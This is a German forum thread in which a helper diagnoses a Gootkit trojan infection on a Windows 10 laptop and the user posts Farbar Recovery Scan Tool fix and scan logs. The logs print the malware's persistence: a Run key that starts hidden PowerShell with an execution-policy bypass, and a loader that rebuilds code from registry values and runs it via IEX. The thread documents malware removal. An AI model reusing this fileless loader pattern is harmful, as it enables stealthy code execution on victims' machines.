Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-24 09:35:06.103
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-17 10:40:12.400
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-17 10:35:48.073
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Speicherinformationen ===========================
BIOS: LENOVO 3JCN23WW 11/10/2016
Hauptplatine: LENOVO Torronto 5C2
Prozessor: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
Prozentuale Nutzung des RAM: 62%
Installierter physikalischer RAM: 8092.13 MB
Verfügbarer physikalischer RAM: 3041.07 MB
Summe virtueller Speicher: 9436.13 MB
Verfügbarer virtueller Speicher: 4083.34 MB
==================== Laufwerke ================================
Drive c: (Windows) (Fixed) (Total:101.53 GB) (Free:32.26 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:931.39 GB) (Free:608.74 GB) NTFS
\\?\Volume{069618c6-dd07-46f2-86fd-8d35a861ec2f}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.49 GB) NTFS
\\?\Volume{13c38bb5-d19e-4e0f-91f2-90d4dec07ba0}\ (LENOVO_PART) (Fixed) (Total:15.48 GB) (Free:2.16 GB) NTFS
\\?\Volume{9e8eda84-9911-4276-af29-84df3c9d329b}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: DF497120)
Partition: GPT.
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 868CFB6E)
Partition: GPT.
==================== Ende von Addition.txt =======================
|
|
28.11.2020, 14:10
| #2 |
| /// TB-Ausbilder   | Windows 10. Information von meinem Provider zu gootkit Trojaner Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen. Ich analysiere gerade dein System und melde mich in Kürze mit weiteren Anweisungen. |
|
28.11.2020, 14:25
| #3 | |
| /// TB-Ausbilder | Windows 10. Information von meinem Provider zu gootkit TrojanerZitat:
Das sind zwei verschiedene Baustellen. Ich sehe in den Logdateien allerdings die Malware, von der hier wohl die Rede ("Gootkit") ist.  Du solltest besser auf deine Downloadquellen achten (von Chip.de und vlc.de solltest du dich zukünftig fernhalten), da hast du dir nämlich diesen Müll auf den Rechner geholt. Schritt 1 Die folgenden Programme sind veraltet, stören die Bereinigung oder es handelt sich um Werbesoftware bzw. unerwünschte Software (Adware, PUP) und müssen entfernt werden.
Schritt 2
Schritt 3
Schritt 4
Bitte poste mit deiner nächsten Antwort:
Geändert von M-K-D-B (28.11.2020 um 14:45 Uhr) |
|
28.11.2020, 15:02
| #4 |
| | Windows 10. Information von meinem Provider zu gootkit Trojaner Hallo Matthias, vielen Dank für die schnelle Antwort und Analyse. Das Deinstallieren hat leider nicht funktioniert. Es kam folgende Meldung: "C:\User\seife\AppData\Local\Host App Service\Uninstall.exe konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den Namen richtig eingegeben haben und wiederholen Sie den Vorgang." die Logdatei des FRST-Fix: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 28-11-2020
durchgeführt von seife (28-11-2020 14:37:29) Run:1
Gestartet von C:\Users\seife\Desktop
Geladene Profile: seife
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [] => [X]
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [addfdabdfbbfef] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('addfdabdfbbfef', 'User'))" <==== ACHTUNG
DeleteKey: HKCU\Software\addfdabdfbbfef
DeleteKey: HKCU\Environment\addfdabdfbbfef
Task: {27460DC2-0BB8-4BF6-92E4-BB3807EA5A28} - System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => C:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-26] (Mozilla Corporation -> Mozilla Foundation)
Task: {654DE0A9-101D-4CEE-BC0A-BD35A77FDFF2} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {67C34546-4E40-44C6-B80F-F2DAA815FDF8} - System32\Tasks\App Explorer => C:\Users\seife\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe <==== ACHTUNG
C:\Users\Default\AppData\Local\Host App Service
C:\Users\defaultuser0\AppData\Local\Host App Service
C:\Users\Public\AppData\Local\Host App Service
C:\Users\seife\AppData\Local\Host App Service
FF Extension: (Avira Browserschutz) - C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi [2020-10-17]
FF Extension: (Avira Browserschutz) - C:\Users\defaultuser0\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi [2020-10-17]
FF Extension: (Avira Browserschutz) - C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi [2020-10-17]
FF Extension: (Avira Browserschutz) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi [2020-10-17]
FF SearchPlugin: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml [2017-02-25]
FF SearchPlugin: C:\Users\defaultuser0\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml [2017-02-25]
FF SearchPlugin: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml [2017-02-25]
FF SearchPlugin: C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml [2017-02-25]
C:\WINDOWS\system32\Tasks\Mozilla
C:\Program Files (x86)\Avira
C:\ProgramData\Avira
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GoodGame
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei
SearchScopes: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001 -> DefaultScope {C22B44EA-66AB-4339-A99C-A01D70B5D782} URL =
SearchScopes: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001 -> {C22B44EA-66AB-4339-A99C-A01D70B5D782} URL =
CMD: ipconfig /flushdns
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: Bitsadmin /Reset /Allusers
Hosts:
RemoveProxy:
SystemRestore: On
EmptyTemp:
*****************
Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Windows\CurrentVersion\Run\\addfdabdfbbfef" => erfolgreich entfernt
HKCU\Software\addfdabdfbbfef => nicht gefunden
HKCU\Environment\addfdabdfbbfef => nicht gefunden
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{27460DC2-0BB8-4BF6-92E4-BB3807EA5A28}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{27460DC2-0BB8-4BF6-92E4-BB3807EA5A28}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mozilla\Firefox Default Browser Agent E7CF176E110C211B" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{654DE0A9-101D-4CEE-BC0A-BD35A77FDFF2}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{654DE0A9-101D-4CEE-BC0A-BD35A77FDFF2}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => nicht gefunden
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{67C34546-4E40-44C6-B80F-F2DAA815FDF8}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67C34546-4E40-44C6-B80F-F2DAA815FDF8}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\App Explorer => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer" => erfolgreich entfernt
C:\Users\Default\AppData\Local\Host App Service => erfolgreich verschoben
C:\Users\defaultuser0\AppData\Local\Host App Service => erfolgreich verschoben
"C:\Users\Public\AppData\Local\Host App Service" => nicht gefunden
"C:\Users\seife\AppData\Local\Host App Service" => nicht gefunden
"C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi" => nicht gefunden
"C:\Users\defaultuser0\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi" => nicht gefunden
C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi => erfolgreich verschoben
"C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml" => nicht gefunden
"C:\Users\defaultuser0\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml" => nicht gefunden
C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml => erfolgreich verschoben
C:\WINDOWS\system32\Tasks\Mozilla => erfolgreich verschoben
C:\Program Files (x86)\Avira => erfolgreich verschoben
C:\ProgramData\Avira => erfolgreich verschoben
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GoodGame => erfolgreich verschoben
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => erfolgreich entfernt
"HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C22B44EA-66AB-4339-A99C-A01D70B5D782} => erfolgreich entfernt
========= ipconfig /flushdns =========
Windows-IP-Konfiguration
Der DNS-Aufl”sungscache wurde geleert.
========= Ende von CMD: =========
========= netsh winsock reset =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
========= netsh advfirewall reset =========
OK.
========= Ende von CMD: =========
========= netsh advfirewall set allprofiles state ON =========
OK.
========= Ende von CMD: =========
========= Bitsadmin /Reset /Allusers =========
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.
0 out of 0 jobs canceled.
========= Ende von CMD: =========
C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
========= Ende von RemoveProxy: =========
SystemRestore: On => abgeschlossen
=========== EmptyTemp: ==========
BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 26553706 B
Java, Flash, Steam htmlcache => 1134 B
Windows/system/drivers => 26726299 B
Edge => 24767 B
Chrome => 686744 B
Firefox => 280992906 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 6656 B
ProgramData => 6656 B
Public => 6656 B
systemprofile => 6656 B
systemprofile32 => 6656 B
LocalService => 38918 B
NetworkService => 38918 B
defaultuser0 => 45574 B
seife => 12402958 B
RecycleBin => 79449 B
EmptyTemp: => 340.3 MB temporäre Dateien entfernt.
================================
Das System musste neu gestartet werden.
==== Ende von Fixlog 14:37:57 ====
Code:
ATTFilter Farbar Recovery Scan Tool (x64) Version: 28-11-2020
durchgeführt von seife (28-11-2020 14:40:39)
Gestartet von C:\Users\seife\Desktop
Start-Modus: Normal
================== Datei-Suche: "SearchAll: Chip Digital GmbH;chip1click;VLC Updater;VLCUpdater;startfenster;GreatDealz;GOODGAME;addfdabdfbbfef" =============
Datei:
========
C:\Users\seife\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\125\http___www_startfenster_de_bigfarm
[2020-11-26 17:19][2020-11-26 17:19] 000037014 _____ () 1F5DC3D993FD34464F4566B30B1FF4F0 [Datei ist nicht signiert]
C:\Users\seife\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\125\http___www_startfenster_de_empire
[2020-11-26 17:19][2020-11-26 17:19] 000037014 _____ () 96102A73D069D69AAAC0EBAA78BA3317 [Datei ist nicht signiert]
C:\Users\seife\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\125\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_GoodGame_uninstall_exe
[2020-11-26 17:19][2020-11-26 17:19] 000037014 _____ () 758B668ABC5A413112B6A9FB5D71FCC8 [Datei ist nicht signiert]
C:\Users\seife\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\125\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_VLC Updater_uninstall_exe
[2020-11-26 17:19][2020-11-26 17:19] 000037014 _____ () 0D46497968CC8F379E04E762DCCC1FE8 [Datei ist nicht signiert]
Ordner:
========
2017-05-22 11:28 - 2020-11-26 20:02 _____ C:\FRST\Quarantine\C\ProgramData\Microsoft\Windows\Start Menu\Programs\GoodGame
Registry:
========
===================== Suchergebnis für "Chip Digital GmbH" ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|chip 1-click installer.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|CHIP Active Download.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|CHIP Starter.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|CHIP Updater.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|SplashForm.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Chip Digital GmbH\chip1click\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Chip Digital GmbH\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E61B1AB66C44604797AC56F6BC3B0FF]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37A47D4566095BF44A2CA19FBDFA04A9]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Starter.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5B90A3D3F68EADC47B40D2D572B76E62]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638EEBF8065E4B845AD5CAB77949D6CC]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Active Download.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\884DF2290FDFBE9408D20E763774932B]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F60B79E6444F2DE4EAC868B34B7EDADA]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Updater.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE90F95E2F75E9143B28CD4FD9C91A78]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\SplashForm.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\E49AC3054380EEC4DA29AB71FAE408A9\InstallProperties]
"Contact"="Chip Digital GmbH"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\E49AC3054380EEC4DA29AB71FAE408A9\InstallProperties]
"InstallLocation"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\E49AC3054380EEC4DA29AB71FAE408A9\InstallProperties]
"Publisher"="Chip Digital GmbH"
===================== Suchergebnis für "chip1click" ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|chip 1-click installer.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|CHIP Active Download.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|CHIP Starter.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|CHIP Updater.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|Chip Digital GmbH|chip1click|SplashForm.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Chip Digital GmbH\chip1click\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E61B1AB66C44604797AC56F6BC3B0FF]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37A47D4566095BF44A2CA19FBDFA04A9]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Starter.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5B90A3D3F68EADC47B40D2D572B76E62]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638EEBF8065E4B845AD5CAB77949D6CC]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Active Download.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\884DF2290FDFBE9408D20E763774932B]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F60B79E6444F2DE4EAC868B34B7EDADA]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Updater.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE90F95E2F75E9143B28CD4FD9C91A78]
"E49AC3054380EEC4DA29AB71FAE408A9"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\SplashForm.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\E49AC3054380EEC4DA29AB71FAE408A9\InstallProperties]
"InstallLocation"="C:\Program Files (x86)\Chip Digital GmbH\chip1click\"
===================== Suchergebnis für "VLC Updater" ==========
===================== Suchergebnis für "VLCUpdater" ==========
===================== Suchergebnis für "startfenster" ==========
===================== Suchergebnis für "GreatDealz" ==========
===================== Suchergebnis für "GOODGAME" ==========
===================== Suchergebnis für "addfdabdfbbfef" ==========
[HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Environment]
"addfdabdfbbfef"="for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\addfdabdfbbfef').$i}Catch{}}IEX($abc)"
[HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run]
"addfdabdfbbfef"="0x020000000000000000000000"
====== Ende von Suche ======
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 28-11-2020
durchgeführt von seife (Administrator) auf HSE (LENOVO 80TV) (28-11-2020 14:56:49)
Gestartet von C:\Users\seife\Desktop
Geladene Profile: seife
Platform: Windows 10 Home Version 1909 18363.1198 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe
(Conexant Systems, Inc.) [Datei ist nicht signiert] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDIntelligent.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe
(Lenovo -> Lenovo Group Ltd.) C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.SettingsApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe <2>
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(LENOVO -> Lenovo(beijing) Limited) C:\ProgramData\Lenovo\ImController\Plugins\IdeaOSDPackage\x64\utility.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\seife\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
